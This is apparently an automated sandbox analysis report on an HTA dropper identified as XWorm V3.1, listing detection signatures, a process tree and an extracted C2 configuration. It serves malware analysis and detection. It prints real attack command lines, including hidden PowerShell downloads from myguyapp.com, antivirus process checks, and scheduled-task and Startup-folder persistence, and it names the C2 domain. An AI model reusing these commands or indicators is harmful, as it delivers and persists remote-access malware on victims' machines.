
Windows Analysis Report
c2.hta

Overview

General Information

Sample name: c2.hta
Analysis ID: 1575551
MD5: 46db5c83fa1e4259626582d675a2daba
SHA1: 9cecd043306e50fb5d6c6a8b4e13631aa8641555
SHA256: 6b29ae721c54add4df7663f763f8be6a1a65259a2243d563a0f3c972ac64623a
Tags: hta, user-abuse_ch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Web Download
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 1368 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 1860 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • Acrobat.exe (PID: 7324 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7580 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7736 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 7340 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 7564 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • msword.exe (PID: 7968 cmdline: msword.exe MD5: C744E054E4EF01832BBF43B81D397B61)
        • cmd.exe (PID: 5328 cmdline: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 3748 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2336 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 5756 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 1276 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 3548 cmdline: cmd /c md 220239 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 5560 cmdline: findstr /V "DimPieLilHot" Statistical MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 3672 cmdline: cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Carter.pif (PID: 3900 cmdline: Carter.pif F MD5: 18CE19B57F43CE0A5AF149C96AECC685)
            • cmd.exe (PID: 7080 cmdline: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1312 cmdline: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 4500 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • RegAsm.exe (PID: 4904 cmdline: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • choice.exe (PID: 5272 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • cmd.exe (PID: 1544 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 3796 cmdline: timeout /t 90 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 5124 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DanielPulse.scr (PID: 7296 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • wscript.exe (PID: 8080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DanielPulse.scr (PID: 7308 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
{"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Yara matches in memory dumps:
Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0xed08:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xeda5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xeeba:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe6e4:$cnc4: POST / HTTP/1.1
Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 00000028.00000002.4141599623.00000000005C2000.00000040.00000400.00020000.00000000.sdmp; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x9e18:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9eb5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9fca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x97f4:$cnc4: POST / HTTP/1.1
Source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

Yara matches in unpacked PE files:
Source: 28.3.Carter.pif.3c63cf0.0.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security
Source: 28.3.Carter.pif.3c63cf0.0.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7bf4:$cnc4: POST / HTTP/1.1
Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack; Rule: MALWARE_Win_AsyncRAT; Description: Detects AsyncRAT; Author: ditekSHen; Strings:
  • 0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x99f4:$cnc4: POST / HTTP/1.1
Source: 40.2.RegAsm.exe.5c0000.0.unpack; Rule: JoeSecurity_XWorm; Description: Yara detected XWorm; Author: Joe Security

System Summary
Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 3900, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 4904, ProcessName: RegAsm.exe
Source: File created; Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 1368, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c[1].bat
Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7080, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 1312, ProcessName: schtasks.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 1368, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 1860, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 5124, ProcessName: wscript.exe
Source: Process started; Author: Max Altgelt (Nextron Systems): Data: Command: Carter.pif F, CommandLine: Carter.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5328, ParentProcessName: cmd.exe, ProcessCommandLine: Carter.pif F, ProcessId: 3900, ProcessName: Carter.pif
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 3900, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 4904, ProcessName: RegAsm.exe
Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 3900, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 7968, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ProcessId: 5328, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7080, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 1312, ProcessName: schtasks.exe
Source: File created; Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 3900, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 5124, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1860, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 7104, ProcessName: powershell.exe

Data Obfuscation

Source: File created; Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4500, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

HIPS / PFW / Operating System Protection Evasion

